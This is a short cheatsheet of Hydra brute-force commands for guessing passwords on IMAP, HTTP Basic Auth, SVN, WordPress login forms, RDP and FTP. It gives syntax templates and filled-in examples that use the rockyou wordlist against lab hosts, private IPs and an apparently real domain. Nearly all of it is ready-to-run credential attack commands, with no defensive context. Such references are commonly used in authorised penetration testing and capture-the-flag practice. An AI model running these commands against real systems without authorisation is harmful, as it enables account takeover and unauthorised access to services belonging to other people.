Brute force attacks cheatsheet - Hydra

Some examples of Brute Force Attacks using the tool Hydra

IMAP

Sintaxis:

hydra -l [email protected] -P /tmp/list-of-passwords.txt -f target.com imap -V

Basic Auth

Sintaxis:

hydra -l <username> -P <passwords_list.txt> -s <port> -f <SERVER> http-get <PATH> -V```

Example:

hydra -l nathens -P /home/username/wordlists/1000-most-common-passwords.txt -f devops.workers.htb -s 80  http-get / -V

SVN

hydra -l [email protected] -P /usr/share/wordlists/rockyou.txt -f 10.10.10.203 svn -V

Wordpress

hydra -l <username> -P <wordlists> <target> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -v

Example:
hydra -l daronwolff -P /usr/share/wordlists/rockyou.txt daronwolff.io -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -v

Remote Desktop Protocol, RDP port 3389

hydra -t 1 -V -f -l  <username> -P <dictionary> rdp://<targetIP>	

hydra -t 1 -V -f -l Administrator -P /usr/share/wordlists/rockyou.txt rdp://192.168.12.124

FTP port 21

hydra -t 1 -V -f -l <username> -P <dictionary> ftp://IP_ADDRESS 

hydra -t 1 -V -f -l Administrator -P /usr/share/wordlists/rockyou.txt ftp://192.168.12.124

More examples here:

frizb/Hydra-Cheatsheet

Hydra Password Cracking Cheetsheet. Contribute to frizb/Hydra-Cheatsheet development by creating an account on GitHub.

GitHubfrizb